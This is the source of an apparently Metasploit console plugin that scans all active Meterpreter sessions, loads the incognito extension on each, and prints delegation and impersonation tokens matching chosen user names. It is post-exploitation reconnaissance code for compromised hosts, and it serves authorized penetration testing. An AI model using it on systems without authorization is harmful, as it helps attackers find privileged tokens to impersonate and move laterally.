Path: blob/master/plugins/token_hunter.rb
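#
# $Id$
# $Revision$
#

module Msf
  # Console plugin that registers the `token_hunt_user` command.
  #
  # The command walks every Meterpreter session known to the framework, makes
  # sure the incognito extension is loaded on it, asks that extension for its
  # token listing and prints the tokens whose account name matches one of the
  # requested users.
  #
  # Reviewer note: the code in this file only lists and prints token names; it
  # never impersonates a token. Token listings like this are the input to token
  # impersonation (MITRE ATT&CK T1134.001), which is why defenders keep
  # privileged interactive logons off lower-trust hosts.
  class Plugin::TokenHunter < Msf::Plugin
    # Console dispatcher that implements the plugin's single command.
    class TokenCommandDispatcher
      include Msf::Ui::Console::CommandDispatcher

      # Display name of the dispatcher. Plugin#cleanup removes the dispatcher
      # by this exact string, so the two must stay in sync.
      def name
        'Token Hunter'
      end

      # Maps each console command name to its one-line help text.
      def commands
        {
          'token_hunt_user' => 'Scan all connected Meterpreter sessions for active tokens corresponding to one or more users'
        }
      end

      # Handler for the `token_hunt_user` console command.
      #
      # Accepted arguments:
      #   -h         print usage and return
      #   -f <file>  read additional user names from <file>, one per line;
      #              blank lines and lines starting with '#' are skipped
      #   <name>...  user names, either bare ("user") or qualified ("DOM\user")
      #
      # A qualified name must equal the whole token name; a bare name is
      # compared with the part of the token after the first backslash. Both
      # comparisons ignore case and surrounding whitespace.
      def cmd_token_hunt_user(*args)
        opts = Rex::Parser::Arguments.new(
          '-h' => [ false, 'This help menu'],
          '-f' => [ true, 'A file containing a list of users to search for (one per line)']
        )

        opt_userfile = nil
        opt_users = []

        opts.parse(args) do |opt, _idx, val|
          case opt
          when '-h'
            token_hunt_usage(opts)
            return
          when '-f'
            opt_userfile = val
          else
            opt_users << val
          end
        end

        if opt_userfile
          begin
            opt_users.concat(read_user_file(opt_userfile))
          rescue SystemCallError => e
            # A missing or unreadable list is an operator typo, not a reason
            # to dump a backtrace into the console.
            print_error("Could not read user file #{opt_userfile}: #{e.message}")
            return
          end
        end

        # Blank entries can never match and would break the name comparison.
        opt_users.reject! { |entry| entry.nil? || entry.strip.empty? }
        opt_users.uniq!

        if opt_users.empty?
          # Nothing to search for: return before touching any session.
          print_error('No user names given')
          token_hunt_usage(opts)
          return
        end

        framework.sessions.each_key do |sid|
          session = framework.sessions[sid]
          # The session may have gone away between each_key and the lookup.
          next if session.nil? || session.type != 'meterpreter'

          print_status(">> Scanning session #{session.sid} / #{session.session_host}")

          session.core.use('incognito') unless session.incognito

          unless session.incognito
            print_status("!! Failed to load incognito on #{session.sid} / #{session.session_host}")
            next
          end

          # NOTE(review): the argument 0 presumably selects listing by user
          # rather than by group -- confirm against the incognito extension.
          res = session.incognito.incognito_list_tokens(0)
          next unless res

          # The two categories keep their historical, differing message
          # prefixes so existing console output is unchanged.
          report_token_matches(session, res['delegation'], opt_users, 'delegation', 'FOUND:')
          report_token_matches(session, res['impersonation'], opt_users, 'impersonation', '>> Found')
        end
      end

      private

      # Prints the usage banner followed by the option table.
      def token_hunt_usage(opts)
        print_line('Usage: token_hunt_user [options] <username> [username] .. [username]')
        print_line(opts.usage)
      end

      # Reads user names from +path+, one per line, skipping blank lines and
      # lines that start with '#'. Raises SystemCallError (Errno::*) when the
      # file cannot be opened or read.
      def read_user_file(path)
        names = []
        ::File.open(path, 'rb') do |fd|
          fd.each_line do |line|
            line.strip!
            next if line.empty? || line.start_with?('#')

            names << line
          end
        end
        names
      end

      # Prints one status line for every (token, wanted user) pair that matches.
      #
      # +token_list+ is the newline-separated listing for one token category;
      # nil is treated as an empty listing. +kind+ and +prefix+ only shape the
      # printed message.
      def report_token_matches(session, token_list, wanted_users, kind, prefix)
        token_list.to_s.split("\n").each do |token|
          wanted_users.each do |needle|
            next unless token_matches?(token, needle)

            print_status("#{prefix} #{session.sid} - #{session.session_host} - #{token} (#{kind})")
          end
        end
      end

      # True when +token+ names the account described by +needle+.
      def token_matches?(token, needle)
        domain, account = needle.split('\\')

        # Qualified needle ("DOM\user"): the whole token name must match.
        return token.strip.downcase == needle.strip.downcase if account

        # Bare needle: compare with the token's account part only.
        return false unless domain

        _token_domain, token_account = token.split('\\')
        !token_account.nil? && token_account.strip.downcase == domain.strip.downcase
      end
    end

    # Registers the command dispatcher with the console when the plugin loads.
    def initialize(framework, opts)
      super
      add_console_dispatcher(TokenCommandDispatcher)
    end

    # Unregisters the dispatcher when the plugin is unloaded; the string must
    # match TokenCommandDispatcher#name.
    def cleanup
      remove_console_dispatcher('Token Hunter')
    end

    # Short plugin identifier.
    def name
      'token_hunter'
    end

    # One-line plugin description.
    def desc
      'Search all active Meterpreter sessions for specific tokens'
    end
  end
end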